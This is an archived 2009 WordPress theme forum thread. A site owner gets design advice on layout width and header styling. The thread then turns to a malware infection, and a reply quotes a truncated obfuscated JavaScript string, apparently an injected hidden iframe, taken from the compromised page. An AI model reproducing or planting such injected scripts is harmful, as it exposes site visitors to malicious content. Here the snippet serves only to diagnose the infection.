Wordpress Themes - WP Forum at BFA
There will be no more development for Atahualpa (or any other theme), and no support. Also no new registrations. I turned off the donation system. I may turn the forum to read only if it gets abused for spam. Unfortunately I have no time for the forum or the themes. Thanks a lot to the people who helped in all these years, especially Larry and of course: Paul. Take care and stay healthy -- Flynn, Atahualpa developer, Sep 2021

Wordpress Themes - WP Forum at BFA » WordPress Themes » Atahualpa 3 Wordpress theme »

Site Review

Old May 15, 2009, 01:27 PM
scrubbs

22 posts · Apr 2009
I have spent a lot of time (and had a lot of advice from Flynn) customizing this theme for my site.. http://www.inspirationalparenting.com . I am looking for feedback on the following:

1. Do you like how it looks?
2. How is the performance.. is it loading fast enough?
3. Is the frontpage catchy?

Any advice ANYONE can offer would be appreciated!!

Last edited by scrubbs; May 15, 2009 at 03:47 PM.
Old May 15, 2009, 07:20 PM
juggledad

23,765 posts · Mar 2009
OSX 10.11.5 WP 4.x Atahualpa(all) Safari, Firefox, Chrome
Hi scrubbs
I'll toss in my two cents.
1) remove the opacity - it causes the blog title box to look strange and on the right side the Dad is shaded.
2) Make sure all your images are the same width and the biggest size of the site Theme Options -> Layout -> Layout MAX width (the baby eyes pic)
3) it's weird to click the Documentation link and end up at the WordPress site. I thought it would be something you wrote up.
4) Left sidebar you have the title LOGIN with items under it. I'd remove this since it's not your site specific (and you can always get in with mysite.org/wordpress/p-admin)

I hope this site works out, we all need some insperation

Juggledad
(Dad of 3 - youngest about to get married)
Old May 15, 2009, 08:02 PM
scrubbs

22 posts · Apr 2009
Thank you Juggledad!

I applied some of your suggestions but wanted to ask you some follow up questions...

1) remove the opacity - it causes the blog title box to look strange and on the right side the Dad is shaded.

I made this change... great idea!

2) Make sure all your images are the same width and the biggest size of the site Theme Options -> Layout -> Layout MAX width (the baby eyes pic)

So I matched the width of my images to what was in the theme by default (1300px). What resolution are you running? It will be very hard to get the pictures wider than that while without stretching them vertically as well. Any ideas on a good way to do this?

3) it's weird to click the Documentation link and end up at the WordPress site. I thought it would be something you wrote up.

Great idea.. done.

4) Left sidebar you have the title LOGIN with items under it. I'd remove this since it's not your site specific (and you can always get in with mysite.org/wordpress/p-admin)

On this one... this site allows anyone to post a story. I did provide a form but am encouraging people to login so they have more control over their posts. Thus I need a way for them to login to their dashboard. I also removed the RSS feeds link from the header and so that gives them the option. I guess I could call it something besides "Login". Thanks for the suggestion though!

On a side note... if you have any stories from your parenting experiences, feel free to add them. I am sure a lot of parents out there could benefit from what you would have to say!

Thanks again!
Old May 16, 2009, 05:01 AM
juggledad

23,765 posts · Mar 2009
So I matched the width of my images to what was in the theme by default (1300px). What resolution are you running? It will be very hard to get the pictures wider than that while without stretching them vertically as well. Any ideas on a good way to do this?

My screen is set to 1440 x 900, but if 1300 is the size of the images, and you want that as the largest screen size, go to Atahualpa Theme Options -> Layout -> Layout MAX width and set it to 1300.

Right now as I make the screen wider, the picture expands and the center expands until I hit 1300, then I keep expanding and header image can't get any bigger, but the layout can, so the blog title floats off the picture.

Not sure what browser/os you're using so I'll be generic. Open a browser to the site. Click the box on the browser so it's not full screen but you can resize the window. Now slide the window partway off the screen and then manually make it wider checking out the header.

Once you add the max width, if someone resizes the window greater than the size you name, they will get an expanding margin past that size. If you want to see an example you can look at my site (http://zenofmud.org). Another way to see the effect is to set the max width on your site to ...say 500 and go look at it.

Paul
Old May 17, 2009, 05:15 AM
juggledad

23,765 posts · Mar 2009
Hey scrubbs
Setting the width MAX did the trick, the header only gets to a max width and then everything stays looking good.

One last thing about the header - the transparency of the title box and it's location verses the images in each photo. Run thru each f your photos and look at the foreground subject(s) verses the background setting. Ask yourself some questions
1) Does my title box placement overlap the subject in the photo
2) can I read the title box over the background
3) does the information stand out.

you might want to play with the style settings of the box (Atahualpa Theme Options -> Header Image -> Overlayed Blog Title/Tagline Style
Old May 20, 2009, 07:07 PM
scrubbs

22 posts · Apr 2009
Do you have any idea how to change the color of the title and subtitle text? I want to make it black so that it shows up better as you have suggested.

I have tried messing with the style settings and can't seem to make a difference. It must be stored somewhere else. Any ideas anyone?
Old May 21, 2009, 04:58 AM
juggledad

23,765 posts · Mar 2009
ATO->Header->Blog Title Color change it to 000000 that's black
ATO->Header->Blog Tagline change 'color:#000000;' to get black

by the way - I'm getting a warning that your site has malware. the warning is from http://google.com/safebrowsing/diagn...or.cn&hl=en-us
Old May 21, 2009, 02:35 PM
scrubbs

22 posts · Apr 2009
Got it.. thanks for the suggestion.

I am really struggling with this malaware thing.. it started yesterday and I have no clue how to fix it. My host (godaddy) is telling me there is nothing wrong. I have no clue what to do!
Old May 21, 2009, 07:22 PM
juggledad

23,765 posts · Mar 2009
hey scrubbs,

looks like you have some code injhected. When I look at the generated source of your page is see this encrypted script:

<script type="text/javascript">var cOTtEtyFSFfjldSGegJo = "lAOY60lAOY105lAOY102lAOY114lAOY97lAOY109lAOY101lA OY32lAOY119lAOY105lAOY100lAOY116lAOY104lAOY61lAOY3 4lAOY52lAOY56lAOY48lAOY34lAOY32lAOY104lAOY101lAOY1 05lAOY103lAOY104lAOY116lAOY61lAOY34lAOY54lAOY48lAO Y34lAOY32lAOY115lAOY114lAOY99lAOY61lAOY34lAOY104lA OY116lAOY1
...snip...

check out http://wordpress.org/support/topic/257128

This is new to me...
Old May 21, 2009, 09:44 PM
scrubbs

22 posts · Apr 2009
Flynn,

Can you give any guidance on this one?
Old May 23, 2009, 10:45 PM
scrubbs

22 posts · Apr 2009
I finally got it all cleaned up. Apparently someone hacked my site password and uploaded some malware scripts to all the index.php files.